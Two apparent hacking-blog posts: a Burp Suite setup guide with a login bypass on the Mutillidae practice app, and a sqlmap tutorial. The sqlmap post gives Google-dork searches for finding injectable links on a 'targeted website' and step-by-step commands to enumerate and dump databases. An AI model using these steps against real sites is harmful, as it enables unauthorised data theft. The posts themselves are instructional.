Thursday, December 10, 2015

BURP SUITE BASICS





WHAT IS BURP SUITE??????

Burp suite is a popular platform in the field of web application penetration testing .It gives you various options in order to explore the basic fundamental process that goes on when a web application is in use.

In this blog I will show how to set-up burp suite and I will also be doing a simple authentication bypass in order to show you clearly how does this platform works.

HOW TO SET-UP BURP SUITE:

1)Download burp suite from https://portswigger.net/burp/  its free
2)Open burp suite.

3)Go to proxy---->options

3)Then feed the IP and port .By default the IP will be 127.0.0.1 & port will be 8080.
4)Open your browser. Go to network options.
5)Change the configuration from NO PROXY to MANUAL PROXY and feed the same IP that you feeded in the burp suite proxy option.

6)Now your Burp suite is set-up.

Ok now that the burp suite is setup .Let me show you a simple authentication bypass using burp suite. For this I will take the help of mutillidae.

-->I opened a simple login page in mutillidae. 

-->Filled in random username and password.Go to intercept option in burpsuite and turn the intercept ON.

-->Now click on LOGIN.
-->Now check the burp suite and you will find intercept data as shown below.

-->Change the username and password with sql payload.

-->Click on forward.
 

 -->And WWWOOOLLLAAA!!!! Its done. Successfully done an authentication bypass 




Hope you got a basic knowledge about this platform and what it is capable of .
TILL THE NEXT BLOG SA-YO-NARA!!!!
And don't forget to COMMENT down your suggestions.


Terms & Warning:

Use this post for educational purposes only and for your self knowledge.
Pro Hack Tricks Blog Team, its Author, Admin cannot be held responsible for any legal action or other action taken against you if you use this script illegally. Use at your own risk. But remember no one is untraceable.

Monday, October 5, 2015

SQL INJECTION USING SQLMAP

This post is about using tool for Penetration Testing that is SQL MAP. Once we get some error on website regarding sql then we can exploit that vulnerability using sql map. But first we need to find some vulnerable links of a targeted websites.



HOW TO FIND SQL ERROR IN A TARGETED WEBSITE??


So For getting targeted links of a website you need to use  google dorks for Example- site: "Targeted website" inurl:.php?id= (Without double quotes). As you will get links related to this then you can open the links and put single quote( ' ) after the link and check vulnerability. If the links the is vulnerable then sql error will pop up like this (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1) this is just an example. The error for sql includes SQL in it so you only have to check if sql is listed in it and  might also be the mysql error it is also the part of SQL. Some where it should be SQL then it is vulnerable.



Now the real game starts for exploiting that vulnerable link.


So now you need SQL MAP and i will use in KALI LINUX (This OS is used by HACKERS). You can use in WINDOWS, MAC, UBUNTU in all the OS steps are same. 

Step 01 :- sqlmap -u "Vulnerable URL" and press enter


Step 02 :- Check whether the Vulnerable URL is injectable or not.


Here url is Vulnerable so i will get injection point.

Step 03 :-  If you get any injection point, then choose the injection point that you want to apply.

Step 04 :- These injection points found by SQLMap are also saved in sqlmap specified address.
You can directly copy PAYLOAD from SQLMAP also here i will directly copy from SQLMAP


Step 05 :- sqlmap -u "Vulnerable URL" --data "Paste the Payload here" and press enter


Step 06 :- sqlmap -u "Vulnerable URL" --data "Payload" --dbs (to get the available databases)


Step 07 :- Choose the database and fetch the tables.


Step 08 :- sqlmap -u "Vulnerable URL" --data "Payload" --tables -D chosen_database


Step 09 :- Fetch the columns now of chosen tables.


Step 10 :- sqlmap -u "Vulnerable URL" --data "Payload" --columns -D chosen_database -T chosen_table


You can fetch multiple columns by adding (,) to the column name.

Step 11 :- Get the data of all columns of chosen_table by dumping it.


Step 12 :- sqlmap -u "Vulnerable URL" --data "Payload" --dump -D chosen_database -T chosen_table


You have now dump of the following data base.



Here is video for this topic










NOTE:

With out prior permition of Developer or Admin of the Website or Webaplication it is illegal to test it for any Vulnerability assessment.



Terms & Warning:

Use this post for educational purposes only and for your self knowledge.
Pro Hack Tricks Blog Team, its Author, Admin cannot be held responsible for any legal action or other action taken against you if you use this script illegally. Use at your own risk. But remember no one is untraceable.